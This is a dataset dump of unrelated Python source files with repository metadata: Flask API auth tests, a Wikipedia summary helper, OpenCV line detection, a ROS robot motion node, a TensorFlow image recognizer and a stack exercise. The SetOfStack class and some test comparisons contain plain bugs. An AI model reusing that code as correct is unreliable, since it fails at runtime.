if 'DELETE' in supported_methods:
resp = self.test_client.delete(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('DELETE', endpoint))
else:
resp = self.test_client.delete(endpoint)
self.assert405(resp, self._error_msg('DELETE', endpoint))
if 'TRACE' in supported_methods:
resp = self.test_client.trace(endpoint)
self.assertNotEqual(405, resp.status_code, self._error_msg('TRACE', endpoint))
else:
resp = self.test_client.trace(endpoint)
self.assert405(resp, self._error_msg('TRACE', endpoint))
# Note what endpoint was tested.
self._tested_endpoint(endpoint)
def _get_json(self, resp):
"""
Decode and return the json reponse.
"""
return json.loads(resp.get_data().decode('ascii'))
def _gen_user(self, username):
"""
Based on a username string, generate a fake email, bogus password, and a new
User object. This new user object is then added to the test db. Returns User
object and the generated password.
Args:
username -- A username string.
"""
email = '{}@email.com'.format(username)
password = '{}_password'.format(username)
u = User(username, email)
u.hash_password(password)
db.session.add(u)
db.session.commit()
user = User.query.filter_by(username = username).first()
return user, password
def _gen_auth_header(self, username, password):
"""
Given a username and password, generate a HTTP Basic Auth header field.
Refer to:
https://tools.ietf.org/html/rfc2617
https://en.wikipedia.org/wiki/Basic_access_authentication#Client_side
Args:
username -- A username string.
password -- A password string.
"""
b = '{0}:{1}'.format(username, password).encode('utf-8')
return {'Authorization': 'Basic ' + base64.b64encode(b).decode('utf-8')}
# assumes _gen_user() has been called to add given user to the test db.
def _verify_credential_check(self, path, method, username, password, data=None):
"""
"""
expected_resp = {
'error': 'Unauthorized access'
}
if method is 'GET':
# case 1 - no auth header
resp = self.test_client.get(path)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 2 - incorrect password
header = self._gen_auth_header(username, 'incorrect')
resp = self.test_client.get(path, headers=header)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 3 - incorrect username
header = self._gen_auth_header('incorrect', password)
resp = self.test_client.get(path, headers=header)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 4 - happy path
header = self._gen_auth_header(username, password)
resp = self.test_client.get(path, headers=header)
# special case for get_job() endpoint. TODO: rethink
if resp.status_code != 404:
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
# case 5 - Require AUTH header on every request.
resp = self.test_client.get(path)
self.assert401(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
elif method is 'POST':
# TODO
self.fail('TODO: not implemented yet!')
else:
self.fail('Unsupported HTTP method "{}"'.format(method))
def test_root_page(self):
"""
Minimal test of any endpoint WITHOUT any authentication.
Refer to:
_verify_methods()
This test verifies that only the HTTP methods specified are supported on the
given endpoint. This helps ensure that we don't accidentally respond to HTTP
methods unintentionally.
"""
endpoint = '/'
supported_methods = frozenset(('GET', 'HEAD'))
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# resp is a flask.wrappers.Response object.
resp = self.test_client.get(endpoint)
self.assert200(resp)
self.assertEqual(b'Hello World!', resp.get_data())
self.assertEqual('text/html', resp.mimetype)
def test_index_page(self):
"""
Minimal test of any endpoint WITHOUT any authentication.
Refer to:
test_root_page()
"""
endpoint = '/index'
supported_methods = frozenset(('GET', 'HEAD'))
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# resp is a flask.wrappers.Response object.
resp = self.test_client.get(endpoint)
self.assert200(resp)
self.assertEqual(b'Hello World!', resp.get_data())
self.assertEqual('text/html', resp.mimetype)
def test_auth_page(self):
"""
Minimal testing of Basic Authentication mechanism.
Refer to:
test_root_page()
_gen_user()
_verify_credential_check()
_gen_auth_header()
We generate and add a user to the test db, then verify that a correct basic
auth header is required to access the endpoint.
"""
endpoint = '/infinote/api/v1.0/auth_test'
supported_methods = frozenset(('GET', 'HEAD'))
u, password = self._gen_user('Dan')
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'GET', u.username, password)
# resp is a flask.wrappers.Response object.
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual({'Result':'Auth Success! Got User Dan'}, self._get_json(resp))
self.assertEqual('application/json', resp.mimetype)
def _compare_jobs_response(self, expected, actual):
if not isinstance(expected, dict):
self.fail('Expected jobs response is not a dict.')
if not isinstance(actual, dict):
self.fail('Actual jobs response is not a dict.')
# match single key 'jobs'
self.assertEqual(expected.keys(), actual.keys())
# get jobs dictionaries
exp_jobs = expected['jobs']
jobs = actual['jobs']
# match job id keys
self.assertEqual(exp_jobs.keys(), jobs.keys())
# for each job, match each (k,v) pair.
for key, value in exp_jobs.items():
job = jobs[key]
for k, v in value.items():
if k == 'id':
k = 'uri'
v = 'http://' + str(infinote_app.config['HOST']) + \
':' + str(infinote_app.config['PORT']) + \
'/infinote/api/v1.0/jobs/' + str(v)
self.assertEqual(v, job[k])
def test_jobs_page_get_jobs(self):
"""
Test the retrieving of jobs for a user.
Refer to:
test_auth_page()
test_jobs_page_create_job()
Ensure that a well formatted json response is received and that it contains
all the jobs for a given user. POST method is tested in
test_jobs_page_create_job().
"""
endpoint = '/infinote/api/v1.0/jobs'
supported_methods = frozenset(('GET', 'HEAD', 'POST'))
u, password = self._gen_user('tom')
expected_resp = {
'jobs': {}
}
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'GET', u.username, password)
# case 1 - no jobs
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
# case 2 - two jobs
uid = 1
jid_1 = 1234
mock_ts_1 = datetime.utcnow().timestamp()
mock_job_1 = {
'id': jid_1,
'v_id': 'abcd',
'label': 'mock_job_1',
'stage': 'init',
'prog': 0.00,
'link': 'http://somelink.com',
'timestamp': mock_ts_1
}
jid_2 = 5678
mock_ts_2 = datetime.utcnow().timestamp()
mock_job_2 = {
'id': jid_2,
'v_id': 'efgh',
'label': 'mock_job_2',
'stage': 'done',
'prog': 1.00,
'link': 'http://somelink.com',
'timestamp': mock_ts_2
}
# prime runtime_data structure in infinote.
infinote.runtime_data.data = {uid:{jid_1:mock_job_1, jid_2:mock_job_2}}
expected_resp = {
'jobs':{str(jid_1):mock_job_1, str(jid_2):mock_job_2}
}
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
self._compare_jobs_response(expected_resp, self._get_json(resp))
def test_jobs_page_create_job(self):
"""
Test the creation of a new job for a user.
Refer to:
test_auth_page()
test_jobs_page_get_jobs()
Ensure that a well formatted json response is received and that it contains
the json detailing the new job for the given user. GET method is tested in
test_jobs_page_get_jobs().
"""
self.skipTest('Not yet.')
endpoint = '/infinote/api/v1.0/jobs'
supported_methods = frozenset(('GET', 'HEAD', 'POST'))
u, password = self._gen_user('tom')
expected_resp = {
'jobs': []
}
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'POST', u.username, password)
# case 1 - no jobs
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert200(resp)
self.assertEqual('application/json', resp.mimetype)
self.assertEqual(expected_resp, self._get_json(resp))
def test_single_job_page(self):
endpoint = '/infinote/api/v1.0/jobs/0'
supported_methods = frozenset(('GET', 'HEAD', 'DELETE')) # TODO: revisit/refine
u, password = self._gen_user('tom')
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
# Ensure this endpoint is protected.
self._verify_credential_check(endpoint, 'GET', u.username, password)
# case 1 - no job
header = self._gen_auth_header(u.username, password)
resp = self.test_client.get(endpoint, headers=header)
self.assert404(resp)
self.assertEqual('application/json', resp.mimetype)
# self.assertEqual(expected_resp, self._get_json(resp))
def test_user_registration(self):
endpoint = '/infinote/api/v1.0/register'
supported_methods = frozenset(('POST',))
# Validate only specified methods are supported.
self._verify_methods(supported_methods, endpoint)
self._tested_endpoint(endpoint)
# case 1 - invalid data
resp = self.test_client.post(endpoint, data='hello')
self.assert400(resp)
if __name__ == '__main__':
unittest.main()
|
[
"kevin.peizner@gmail.com"
] |
kevin.peizner@gmail.com
|
8c7a45fa73c495255a631c06dbfbe0936b8dd4d8
|
fd4e4f5ace56f86191ef407d163d920e5364d0b4
|
/zsl/utils/text.py
|
a18029694e769afc098ea5f81b7adb3189f5e536
|
[] |
no_license
|
ChenWWWeixiang/zsl-pytorch
|
6f744ac8fb56daacc667fcedbac8d4edc2073c25
|
0961714b396189e90196be9272bc5876ec6fd21e
|
refs/heads/master
| 2022-04-15T08:45:27.105442
| 2020-04-02T11:18:06
| 2020-04-02T11:18:06
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,243
|
py
|
import string
import functools
import wikipedia
@functools.lru_cache(maxsize=200)
def wikipedia_description(search_term: str,
remove_punct: bool = False,
to_lower: bool = False,
**kwargs) -> str:
"""
Gets a description from wikipedia given a search term
This method adds extra functionality to `wikipedia.summary` function.
To learn more about it check: https://github.com/goldsmith/Wikipedia
Parameters
----------
search_term: str
Word or set of words to look for at wikipedia.
remove_punct: bool, default False
If set to true, the punctuation of the resulting description will be
removed
to_lower: bool, default False
If set to true, the description will be transformed to lowercase
kwargs: delegated parameters to `wikipedia.summary`
Returns
-------
str
Wikipedia description
"""
summary = wikipedia.summary(search_term, **kwargs)
if to_lower:
summary = summary.lower()
if remove_punct:
punct_set = set(string.punctuation)
summary = ''.join(' ' if o in punct_set else o for o in summary)
return summary
|
[
"guillem.orellana@gmail.com"
] |
guillem.orellana@gmail.com
|
ec70d2b89d8107f3322a776f872a58936d9e6928
|
85db9d26afb8e2b5e5eac9f8173db2cb14f0d25c
|
/Morph_Text.py
|
ab988029a9c977706c737ae6ce88c1fe0e4071aa
|
[] |
no_license
|
kool7/Digit_Recognition_Using_OpenCV
|
890e980055c9cb9768353b0243cb34d274dfd77e
|
5e654c4f1bae97a6ccd523ffc5ee17a4f955badd
|
refs/heads/master
| 2021-04-10T23:42:40.467544
| 2020-04-18T13:15:00
| 2020-04-18T13:15:00
| 248,976,857
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,303
|
py
|
import cv2
import numpy as np
# Working on PNG images Only.
image = cv2.imread('plate/mh.png', cv2.IMREAD_UNCHANGED)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
ret,binary = cv2.threshold(gray, 0, 255, cv2.THRESH_OTSU | cv2.THRESH_BINARY)
binary = cv2.bitwise_not(binary)
H = cv2.Sobel(binary, cv2.CV_8U, 0, 2)
V = cv2.Sobel(binary, cv2.CV_8U, 2, 0)
rows,cols = image.shape[:2]
contours, hierachy = cv2.findContours(V, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
(x,y,w,h) = cv2.boundingRect(cnt)
# rows/3 is the threshold for length of line
if h > rows/3:
cv2.drawContours(V, [cnt], -1, 255, -1)
cv2.drawContours(binary, [cnt], -1, 255, -1)
else:
cv2.drawContours(V, [cnt], -1, 0, -1)
contours, hierachy = cv2.findContours(H, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
for cnt in contours:
(x,y,w,h) = cv2.boundingRect(cnt)
# cols/3 is the threshold for length of line
if w > cols/3:
cv2.drawContours(H, [cnt], -1, 255, -1)
cv2.drawContours(binary, [cnt], -1, 255, -1)
else:
cv2.drawContours(H, [cnt], -1, 0, -1)
kernel = cv2.getStructuringElement(shape=cv2.MORPH_RECT, ksize=(3,3))
H = cv2.morphologyEx(H, cv2.MORPH_DILATE, kernel,iterations = 3)
V = cv2.morphologyEx(V, cv2.MORPH_DILATE, kernel, iterations = 3)
cross = cv2.bitwise_and(H, V)
contours, hierachy = cv2.findContours(cross,cv2.RETR_LIST,cv2.CHAIN_APPROX_SIMPLE)
centroids = []
for cnt in contours:
mom = cv2.moments(cnt)
(x,y) = mom['m10']/mom['m00'], mom['m01']/mom['m00']
cv2.circle(image,(int(x),int(y)),4,(0,255,0),-1)
centroids.append((x,y))
centroids.sort(key = lambda x: x[0], reverse = False)
centroids.sort(key = lambda x: x[1], reverse = False)
dx = int(centroids[1][0] - centroids[0][0])
centroids = np.array(centroids, dtype = np.float32)
(x,y,w,h) = cv2.boundingRect(centroids)
if x-dx > -5: x = max(x-dx,0)
if h+dx <= rows+5: h = min(h+dx,rows)
if w+dx <= cols+5: w = min(w+dx,cols)
cv2.rectangle(image, (x,y), (x+w,y+h), (0,255,0))
roi = binary[y:y+h,x:x+w]
roi = cv2.morphologyEx(roi, cv2.MORPH_OPEN, kernel,iterations = 1)
cv2.imshow('image', image)
cv2.imshow('roi', roi)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
[
"noreply@github.com"
] |
kool7.noreply@github.com
|
1bf72ff07ec719e1207835f5f8cfc840672d40a7
|
f7b0814fffb191eb3d8209644649a2fbc3580f27
|
/testraction.py
|
a7e82672b1f8e594431609e943814642e09737ff
|
[] |
no_license
|
JulianKimmig/chemformatics
|
51bbf87d3440cd404a442f830fdff2f1446cd425
|
4b200fa1e8860b2d685f75b5de1afcc74e6a533f
|
refs/heads/master
| 2020-04-15T19:13:21.131241
| 2019-02-08T14:31:53
| 2019-02-08T14:31:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 96
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Wed Jan 9 10:30:10 2019
@author: Julian Stobbe
"""
|
[
"flamel90@gmail.com"
] |
flamel90@gmail.com
|
2f2feff517c8c11a7a8c48bf20a7da017e4316e5
|
0e647273cffc1fb6cbd589fa3c7c277b221ba247
|
/configs/hpt-pretrain/pascal/no_basetrain/100000-iters.py
|
2fc7e342ce4e0fa096acea278c7d0760030a4228
|
[
"Apache-2.0"
] |
permissive
|
Berkeley-Data/OpenSelfSup
|
e9976bf011b69ebf918506ba184f464b1073ec13
|
221191b88d891de57725b149caf237ffef72e529
|
refs/heads/master
| 2023-05-12T07:34:52.268476
| 2021-04-08T00:58:37
| 2021-04-08T00:58:37
| 343,654,823
| 0
| 1
|
Apache-2.0
| 2021-04-08T00:58:37
| 2021-03-02T05:20:27
|
Python
|
UTF-8
|
Python
| false
| false
| 202
|
py
|
_base_="../base-pascal-config.py"
# this will merge with the parent
# epoch related
total_iters=100000
checkpoint_config = dict(interval=total_iters)
checkpoint_config = dict(interval=total_iters//2)
|
[
"taeil.goh@gmail.com"
] |
taeil.goh@gmail.com
|
86b8c02212495351487f2f5621118666a4b71023
|
d09b5fe877f351eafd00c26c844ec366855359ab
|
/Chapter-3/3_set_of_stacks.py
|
795418acb469d99f425012a13c9aa047414fe172
|
[] |
no_license
|
viveksyngh/CTCI-6th-Edition-Python-Solution
|
c788bfdb9d94e70f9c59ee218f5cccac9304f7fb
|
6c4c9a09418e3b5e75355b68f85c3a4077b835e5
|
refs/heads/master
| 2022-10-23T21:41:54.295719
| 2022-10-09T10:55:12
| 2022-10-09T10:55:12
| 73,009,966
| 3
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 888
|
py
|
# Set of Stacks
class Stack(object):
def __init__(self):
self.items = []
def push(self, item):
self.items.append(item)
def pop(self):
if not self.items:
raise IndexError("Stack in empty")
return self.items.pop()
def peek(self):
return self.items[-1]
def size(self):
return len(self.items)
def is_empty(self):
return not bool(self.items)
class SetOfStack(object):
def __init__(self, capacity):
self.capacity = capacity
self.stacks = []
def push(self, item):
if not self.stacks or self.stacks[i].size == self.capacity:
new_stack = Stack()
new_stack.push(item)
self.stacks.push(new_stack)
else:
top_stack = self.stacks[-1]
top_stack.push(item)
def pop(self):
if not self.stacks:
raise IndexError("Stack is empty.")
top_stack = self.stacks[-1]
poped_item = top_stack.pop()
if top_stack.size() == 0:
self.stacks.pop()
|
[
"vivek@happay.in"
] |
vivek@happay.in
|
b97e8b57598f03a0b8337899d213846df07c12cc
|
8675eba922d0d1e53aa28d1dfd95b5ec64db46d0
|
/task1.py
|
c768c22a63aa8221c22140b3ecd7d69b52cc55ef
|
[] |
no_license
|
ilya-dychkov/cloud-computing
|
87bae3d4bde04526e8ac0c1ebbb0cfc4c9eb88eb
|
47a028fa76683bd9c6c80bbf413dd9a0809c67f2
|
refs/heads/master
| 2023-03-27T12:10:08.199647
| 2021-03-31T02:49:03
| 2021-03-31T02:49:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 104
|
py
|
def sum_elements(arr: list):
return sum(arr)
print(sum_elements([1, 2, 3, 4, 5, 6, 7, 8, 9, 10]))
|
[
"ilya.dychkov@gmail.com"
] |
ilya.dychkov@gmail.com
|
abdbb325934f65ffa36249b8d9974220e8175000
|
81eff1c9bc75cd524153400cdbd7c453ee8e3635
|
/zxcar_ws/src/zxcar_nav/nodes/odom_out_and_back.py
|
996790219d20a191ee2afb68a5e9d7506c6217f4
|
[] |
no_license
|
sukai33/zxcar_all
|
bbacbf85c5e7c93d2e98b03958342ec01e3dafd9
|
af389f095591a70cae01c1d116aa74d68223f317
|
refs/heads/master
| 2023-01-03T13:32:00.864543
| 2020-10-29T05:22:43
| 2020-10-29T05:22:43
| 300,556,457
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,622
|
py
|
#!/usr/bin/env python
import rospy
from geometry_msgs.msg import Twist, Point, Quaternion
import tf
from zxcar_nav.transform_utils import quat_to_angle, normalize_angle
from math import radians, copysign, sqrt, pow, pi
class OutAndBack():
def __init__(self):
# Give the node a name
rospy.init_node('out_and_back', anonymous=False)
# Set rospy to execute a shutdown function when exiting
rospy.on_shutdown(self.shutdown)
# Publisher to control the robot's speed
self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=5)
# How fast will we update the robot's movement?
rate = 20
# Set the equivalent ROS rate variable
r = rospy.Rate(rate)
# Set the forward linear speed to 0.15 meters per second
linear_speed = 0.15
# Set the travel distance in meters
goal_distance = 1.0
# Set the rotation speed in radians per second
angular_speed = 0.5
# Set the angular tolerance in degrees converted to radians
angular_tolerance = radians(1.0)
# Set the rotation angle to Pi radians (180 degrees)
goal_angle = pi
# Initialize the tf listener
self.tf_listener = tf.TransformListener()
# Give tf some time to fill its buffer
rospy.sleep(2)
# Set the odom frame
self.odom_frame = '/odom'
# Find out if the robot uses /base_link or /base_footprint
try:
self.tf_listener.waitForTransform(self.odom_frame, '/base_footprint', rospy.Time(), rospy.Duration(1.0))
self.base_frame = '/base_footprint'
except (tf.Exception, tf.ConnectivityException, tf.LookupException):
try:
self.tf_listener.waitForTransform(self.odom_frame, '/base_link', rospy.Time(), rospy.Duration(1.0))
self.base_frame = '/base_link'
except (tf.Exception, tf.ConnectivityException, tf.LookupException):
rospy.loginfo("Cannot find transform between /odom and /base_link or /base_footprint")
rospy.signal_shutdown("tf Exception")
# Initialize the position variable as a Point type
position = Point()
# Loop once for each leg of the trip
for i in range(2):
# Initialize the movement command
move_cmd = Twist()
# Set the movement command to forward motion
move_cmd.linear.x = linear_speed
# Get the starting position values
(position, rotation) = self.get_odom()
x_start = position.x
y_start = position.y
# Keep track of the distance traveled
distance = 0
# Enter the loop to move along a side
while distance < goal_distance and not rospy.is_shutdown():
# Publish the Twist message and sleep 1 cycle
self.cmd_vel.publish(move_cmd)
r.sleep()
# Get the current position
(position, rotation) = self.get_odom()
# Compute the Euclidean distance from the start
distance = sqrt(pow((position.x - x_start), 2) +
pow((position.y - y_start), 2))
# Stop the robot before the rotation
move_cmd = Twist()
self.cmd_vel.publish(move_cmd)
rospy.sleep(1)
# Set the movement command to a rotation
move_cmd.angular.z = angular_speed
# Track the last angle measured
last_angle = rotation
# Track how far we have turned
turn_angle = 0
while abs(turn_angle + angular_tolerance) < abs(goal_angle) and not rospy.is_shutdown():
# Publish the Twist message and sleep 1 cycle
self.cmd_vel.publish(move_cmd)
r.sleep()
# Get the current rotation
(position, rotation) = self.get_odom()
# Compute the amount of rotation since the last loop
delta_angle = normalize_angle(rotation - last_angle)
# Add to the running total
turn_angle += delta_angle
last_angle = rotation
# Stop the robot before the next leg
move_cmd = Twist()
self.cmd_vel.publish(move_cmd)
rospy.sleep(1)
# Stop the robot for good
self.cmd_vel.publish(Twist())
def get_odom(self):
# Get the current transform between the odom and base frames
try:
(trans, rot) = self.tf_listener.lookupTransform(self.odom_frame, self.base_frame, rospy.Time(0))
except (tf.Exception, tf.ConnectivityException, tf.LookupException):
rospy.loginfo("TF Exception")
return
return (Point(*trans), quat_to_angle(Quaternion(*rot)))
def shutdown(self):
# Always stop the robot when shutting down the node.
rospy.loginfo("Stopping the robot...")
self.cmd_vel.publish(Twist())
rospy.sleep(1)
if __name__ == '__main__':
try:
OutAndBack()
except:
rospy.loginfo("Out-and-Back node terminated.")
|
[
"422168787@qq.com"
] |
422168787@qq.com
|
930cbd02d0f423a4e087247dbdcc1fd14617649f
|
5b2123213495bb7892cf336cce6b5a613ece5cc6
|
/src/faf/tools/md5.py
|
df55a662ee01ee654b4ae2c97e43828bd72f774e
|
[] |
no_license
|
Wesmania/fafpyclient-mockup
|
06e6e1b8258e894eb1f8f27de8cdfb27a76b8574
|
d8d744ff6c81a6197dff8dc638ecb219b9dd9b70
|
refs/heads/master
| 2022-09-27T06:47:53.979785
| 2020-06-02T20:25:56
| 2020-06-02T20:25:56
| 255,061,564
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 114
|
py
|
import hashlib
def md5(text):
m = hashlib.md5()
m.update(text.encode('utf-8'))
return m.hexdigest()
|
[
"i.kotrasinsk@gmail.com"
] |
i.kotrasinsk@gmail.com
|
94c926414287861d3a32a08b2df635ca67a7b61c
|
ec00584ab288267a7cf46c5cd4f76bbec1c70a6b
|
/offline/__Digital_Twin/__release2/rough_data/rrps.dt.follower.example/rrps/dt/__init__.py
|
33521ddf66690c4e443af46cdc3b83fb4241df4e
|
[] |
no_license
|
rahuldbhadange/Python
|
b4cc806ff23953389c9507f43d817b3815260e19
|
7e162117f1acc12537c7eeb36d6983d804122ff3
|
refs/heads/master
| 2021-06-23T05:04:20.053777
| 2020-01-28T10:34:28
| 2020-01-28T10:34:28
| 217,307,612
| 0
| 0
| null | 2021-06-10T22:44:11
| 2019-10-24T13:35:42
|
Python
|
UTF-8
|
Python
| false
| false
| 252
|
py
|
# For pkgutil namespace compatibility only. Must NOT contain anything else. See also:
# https://packaging.python.org/guides/packaging-namespace-packages/#pkgutil-style-namespace-packages
__path__ = __import__('pkgutil').extend_path(__path__, __name__)
|
[
"46024570+rahuldbhadange@users.noreply.github.com"
] |
46024570+rahuldbhadange@users.noreply.github.com
|
5c0f18ca80a73c71aa9dcfb6977ae5ae66dc1b96
|
c9f8845a8e16ccf82dad497fa2a51a9465246b6c
|
/person.py
|
f036148f0a7e4370c05ebd6315009f5e06bfc673
|
[] |
no_license
|
EstherPholie/dev2
|
62cde5e9efe19d6eb725838affbba0fd9af7c94d
|
50272c2b71b2eff68f705f49ab50413276bf947d
|
refs/heads/master
| 2020-06-18T07:47:46.833049
| 2019-07-18T16:19:20
| 2019-07-18T16:19:20
| 196,220,097
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 320
|
py
|
def get_age():
age=int(input("Enter your age"))
return age
def get_name():
name=input("Enter your name")
print(name)
return name
myage = get_age()
myname=get_name()
print("my name is %s !" % myname)
print("my age is %d !" % myage)
print("my name is %s and my age is %d!" % (myname, myage))
|
[
"estherpyholie85@gmail.com"
] |
estherpyholie85@gmail.com
|
f8a4b61f90173f7571cd11ec7a5c7ff63d360898
|
dfee0fa1ec1abafbc176f6d013d4c06212169538
|
/test/reconfigure.py
|
407fdb88c37647df3287ff1d2b5d43ced953f129
|
[] |
no_license
|
lflxp/tf-study
|
bbcf56dfd34e52b8358cbb9c0ba3812ff2e7325c
|
deea074f210f2d34052f560988374dea0c24bb92
|
refs/heads/master
| 2020-04-19T09:15:48.383763
| 2019-01-30T18:24:47
| 2019-01-30T18:24:47
| 168,104,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,449
|
py
|
#!~/tf/venv/bin/python
# -*- coding: UTF-8 -*-
import tensorflow as tf
import numpy as np
import PIL.Image as Image
from skimage import io, transform
def recognize(jpg_path, pb_file_path):
with tf.Graph().as_default():
output_graph_def = tf.GraphDef()
with open(pb_file_path, "rb") as f:
output_graph_def.ParseFromString(f.read())
_ = tf.import_graph_def(output_graph_def, name="")
with tf.Session() as sess:
init = tf.global_variables_initializer()
sess.run(init)
input_x = sess.graph.get_tensor_by_name("input:0")
print input_x
out_softmax = sess.graph.get_tensor_by_name("softmax:0")
print out_softmax
out_label = sess.graph.get_tensor_by_name("output:0")
print out_label
img = io.imread(jpg_path)
img = transform.resize(img, (224, 224, 3))
img_out_softmax = sess.run(out_softmax, feed_dict={input_x:np.reshape(img, [-1, 224, 224, 3])})
print "img_out_softmax:",img_out_softmax
prediction_labels = np.argmax(img_out_softmax, axis=1)
print "label:",prediction_labels
recognize("./pic/dog5.jpg", "train2.pb")
# ---------------------
# 作者:ppplinday
# 来源:CSDN
# 原文:https://blog.csdn.net/u014432647/article/details/75276718
# 版权声明:本文为博主原创文章,转载请附上博文链接!
|
[
"382023823@qq.com"
] |
382023823@qq.com
|
f9320732fb97365a434b7cfa02c9bf5ac40c293b
|
4f2e28f4a6dcb82029a187a7708684fffaca9722
|
/app.py
|
3c19b50311dbcfa432b00da2cc79151b805eeaa5
|
[] |
no_license
|
NamanChuriwala/ChatZoo
|
9ae12f8ec4a29a12c27421c99b3de3e1fd897d67
|
50820761ed010a3d95124f280882f93da9e731f1
|
refs/heads/master
| 2022-11-05T06:11:33.890272
| 2020-06-19T16:52:28
| 2020-06-19T16:52:28
| 273,540,924
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 743
|
py
|
from flask import Flask, jsonify, request, render_template
from flask_sqlalchemy import SQLAlchemy
from flask_login import LoginManager
import os
from dotenv import load_dotenv
load_dotenv('./chatzoo.env')
SECRET_KEY = os.urandom(32)
DB_URI = os.environ.get('DB_URI')
db = SQLAlchemy()
login_manager = LoginManager()
rooms = ['coding', 'gaming', 'art', 'music']
def create_app():
app = Flask(__name__)
app.config['SECRET_KEY'] = SECRET_KEY
app.config['SQLALCHEMY_DATABASE_URI'] = DB_URI
app.config['SQLALCHEMY_ECHO'] = True
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db.init_app(app)
login_manager.init_app(app)
with app.app_context():
import routes
db.create_all()
return app
|
[
"bondnam96@gmail.com"
] |
bondnam96@gmail.com
|
dfef097237cdcb18aff0d3b69da840e8e0c440de
|
f0d713996eb095bcdc701f3fab0a8110b8541cbb
|
/nn7Na6zHLEHS9R8j2_21.py
|
fcae13e8a60d7d2553b9fa6c7f770ad1376b9dda
|
[] |
no_license
|
daniel-reich/turbo-robot
|
feda6c0523bb83ab8954b6d06302bfec5b16ebdf
|
a7a25c63097674c0a81675eed7e6b763785f1c41
|
refs/heads/main
| 2023-03-26T01:55:14.210264
| 2021-03-23T16:08:01
| 2021-03-23T16:08:01
| 350,773,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 721
|
py
|
"""
Create a function that takes a list and returns the number of ALL elements
within it (including those within the sub-level list(s)).
### Examples
deep_count([1, 2, 3]) ➞ 3
deep_count([[1], [2], [3]]) ➞ 6
deep_count(["x", "y", ["z"]]) ➞ 4
deep_count(["a", "b", ["c", "d", ["e"]]]) ➞ 7
### Notes
In the examples above, notice how the sub-lists within the main list count as
an element _as well as_ the elements within that sub-list.
"""
def deep_count(lst):
if not isinstance(lst,list):
return 1
s = 0
for item in lst:
if not isinstance(item,list):
s = s + 1
else:
s = s + 1
s = s + deep_count(item)
return s
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.